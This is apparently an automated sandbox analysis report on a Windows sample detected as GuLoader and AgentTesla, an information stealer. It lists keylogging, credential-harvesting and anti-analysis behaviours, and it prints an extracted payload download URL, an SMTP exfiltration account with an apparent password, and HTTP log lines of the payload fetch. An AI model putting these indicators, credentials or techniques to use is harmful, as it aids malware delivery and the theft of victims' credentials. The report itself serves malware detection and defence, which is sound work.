Windows Analysis Report G47wmLn8uy.exe

Overview

General Information

Sample Name: G47wmLn8uy.exe
Analysis ID: 539603
MD5: 9a1518ed709f916360e56b5ac7d76995
SHA1: 7c85312d66edf5b02ebd6c25cfe9c036a3471263
SHA256: 2a0878c196278384aab473c92977d236680c788b4e5ae0cc1f415a075a6fa9e2
Infos:

Most interesting Screenshot:

Detection

GuLoader AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Found detection on Joe Sandbox Cloud Basic with higher score
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to register a low level keyboard hook
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000013.00000000.1107473483.0000000000D30000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1rvzmbX5uh5o/"}
Source: CasPol.exe.4712.19.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "bin2laden@yandex.combombom222smtp.yandex.com"}
Multi AV Scanner detection for submitted file
Source: G47wmLn8uy.exe Virustotal: Detection: 26% Perma Link
Source: G47wmLn8uy.exe ReversingLabs: Detection: 15%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_01102C6C CryptUnprotectData, 19_2_01102C6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_011033C0 CryptUnprotectData, 19_2_011033C0

Compliance:

barindex
Uses 32bit PE files
Source: G47wmLn8uy.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.181.238:443 -> 192.168.11.20:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.65:443 -> 192.168.11.20:49761 version: TLS 1.2

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1rvzmbX5uh5o/
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 77.88.21.158 77.88.21.158
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/g955ofpf5ri5rpdjdcedlr3l5sifs0gg/1639494750000/08820895400503972853/*/1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-0o-docs.googleusercontent.comConnection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49770 -> 77.88.21.158:587
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.11.20:49770 -> 77.88.21.158:587
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 00000013.00000002.5686422952.000000001DF08000.00000004.00000001.sdmp String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 00000013.00000002.5693666644.0000000020081000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmp String found in binary or memory: http://crl.certum.pl/ca.crl0h
Source: CasPol.exe, 00000013.00000002.5665528385.00000000011DB000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmp String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: CasPol.exe, 00000013.00000003.1304902046.000000000125C000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000003.1304228961.0000000001261000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5669045312.000000000125C000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 00000013.00000003.1304902046.000000000125C000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000003.1304228961.0000000001261000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5669045312.000000000125C000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp String found in binary or memory: http://crls.yandex.net/certum/ycasha2.crl0-
Source: CasPol.exe, 00000013.00000002.5686422952.000000001DF08000.00000004.00000001.sdmp String found in binary or memory: http://oQCcllY8wcJ5yZF5.org
Source: CasPol.exe, 00000013.00000002.5686422952.000000001DF08000.00000004.00000001.sdmp String found in binary or memory: http://oQCcllY8wcJ5yZF5.orgt-
Source: CasPol.exe, 00000013.00000002.5693666644.0000000020081000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmp String found in binary or memory: http://repository.certum.pl/ca.cer09
Source: CasPol.exe, 00000013.00000002.5665528385.00000000011DB000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmp String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp String found in binary or memory: http://repository.certum.pl/ycasha2.cer0
Source: CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp String found in binary or memory: http://smtp.yandex.com
Source: CasPol.exe, 00000013.00000002.5693666644.0000000020081000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmp String found in binary or memory: http://subca.ocsp-certum.com0.
Source: CasPol.exe, 00000013.00000002.5665528385.00000000011DB000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmp String found in binary or memory: http://subca.ocsp-certum.com01
Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp String found in binary or memory: http://uYFyNj.com
Source: CasPol.exe, 00000013.00000002.5693666644.0000000020081000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5665528385.00000000011DB000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5693982737.00000000200AA000.00000004.00000001.sdmp String found in binary or memory: http://www.certum.pl/CPS0
Source: CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp String found in binary or memory: http://yandex.crl.certum.pl/ycasha2.crl0q
Source: CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp String found in binary or memory: http://yandex.ocsp-responder.com03
Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org%4
Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: CasPol.exe, 00000013.00000003.1304902046.000000000125C000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000003.1304228961.0000000001261000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: CasPol.exe, 00000013.00000003.1304902046.000000000125C000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000003.1304228961.0000000001261000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: CasPol.exe, 00000013.00000003.1304902046.000000000125C000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp String found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/
Source: CasPol.exe, 00000013.00000003.1304818757.000000000124B000.00000004.00000001.sdmp String found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/%%doc-08-0o-docs.googleusercontent.com
Source: CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp String found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/BQG
Source: CasPol.exe, 00000013.00000003.1304902046.000000000125C000.00000004.00000001.sdmp String found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/P~K
Source: CasPol.exe, 00000013.00000002.5669045312.000000000125C000.00000004.00000020.sdmp String found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/g955ofpf
Source: CasPol.exe, 00000013.00000002.5665528385.00000000011DB000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB
Source: CasPol.exe, 00000013.00000002.5685409236.000000001DEA3000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5687978383.000000001DFAE000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5687978383.000000001DFAE000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5687978383.000000001DFAE000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 00000013.00000002.5685409236.000000001DEA3000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CasPol.exe, 00000013.00000002.5666942891.0000000001219000.00000004.00000020.sdmp, CasPol.exe, 00000013.00000002.5687458288.000000001DF78000.00000004.00000001.sdmp String found in binary or memory: https://www.certum.pl/CPS0
Source: CasPol.exe, 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/g955ofpf5ri5rpdjdcedlr3l5sifs0gg/1639494750000/08820895400503972853/*/1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-0o-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.250.181.238:443 -> 192.168.11.20:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.65:443 -> 192.168.11.20:49761 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a global keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe Jump to behavior
Contains functionality to register a low level keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_0110D7C0 SetWindowsHookExW 0000000D,00000000,?,? 19_2_0110D7C0
Creates a window with clipboard capturing capabilities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary:

barindex
Found detection on Joe Sandbox Cloud Basic with higher score
Source: G47wmLn8uy.exe Joe Sandbox Cloud Basic: Detection: malicious Score: 100 Threat Name: GuLoader AgentTesla Perma Link
Uses 32bit PE files
Source: G47wmLn8uy.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB1099 2_2_02AB1099
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_00C092D8 19_2_00C092D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_00C02BA0 19_2_00C02BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_00C03E38 19_2_00C03E38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_00C4F128 19_2_00C4F128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_00C44508 19_2_00C44508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_00C4E9B0 19_2_00C4E9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_00C43C38 19_2_00C43C38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_00C438F0 19_2_00C438F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_00C40F10 19_2_00C40F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_00FFCCEF 19_2_00FFCCEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_00FFB170 19_2_00FFB170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_00FF3697 19_2_00FF3697
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_00FF4748 19_2_00FF4748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_010FB148 19_2_010FB148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_010F2B78 19_2_010F2B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_010F67C0 19_2_010F67C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_010F5578 19_2_010F5578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_010F5574 19_2_010F5574
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_01108960 19_2_01108960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_01104880 19_2_01104880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_01105B78 19_2_01105B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_0110AA50 19_2_0110AA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_0110CD88 19_2_0110CD88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_01100438 19_2_01100438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_01100448 19_2_01100448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_01103FF8 19_2_01103FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_1DCE5D08 19_2_1DCE5D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_1DCE4394 19_2_1DCE4394
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_1DCE5CC1 19_2_1DCE5CC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_1DCE69F1 19_2_1DCE69F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_010F8370 19_2_010F8370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 19_2_010FB2FF 19_2_010FB2FF
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00C48BA8 appears 52 times
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: G47wmLn8uy.exe, 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFort.exe vs G47wmLn8uy.exe
Source: G47wmLn8uy.exe, 00000002.00000002.1333542144.0000000002BC0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameFort.exeFE2X vs G47wmLn8uy.exe
Source: G47wmLn8uy.exe Binary or memory string: OriginalFilenameFort.exe vs G47wmLn8uy.exe
PE file contains strange resources
Source: G47wmLn8uy.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: G47wmLn8uy.exe Virustotal: Detection: 26%
Source: G47wmLn8uy.exe ReversingLabs: Detection: 15%
Source: G47wmLn8uy.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\G47wmLn8uy.exe "C:\Users\user\Desktop\G47wmLn8uy.exe"
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe"
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe"
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe" Jump to behavior
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe" Jump to behavior
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe" Jump to behavior
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\G47wmLn8uy.exe File created: C:\Users\user\AppData\Local\Temp\~DF81F8B836C10D3FC0.TMP Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/2@3/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:120:WilError_03
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000013.00000000.1107473483.0000000000D30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1333152081.0000000002AB0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_00406471 push edi; iretd 2_2_00406472
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_00409011 push esp; retf 2_2_00409013
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_0040682F push esi; retf 2_2_00406830
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_0040A490 push ds; iretd 2_2_0040A491
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_004079F6 push eax; retf 2_2_00407A10
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_004055BF push ds; ret 2_2_004055D9
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_00405ECC push ebp; ret 2_2_00405ED8
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_00407F27 push edi; ret 2_2_00407F28
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_00407FBA push eax; iretd 2_2_00407FBB
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB0EAF push ebx; retf 2_2_02AB0EB0
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB34A0 push edx; retf 2_2_02AB355C
Source: C:\Users\user\Desktop\G47wmLn8uy.exe Code function: 2_2_02AB208F push eax; retf 2_2_02AB2090
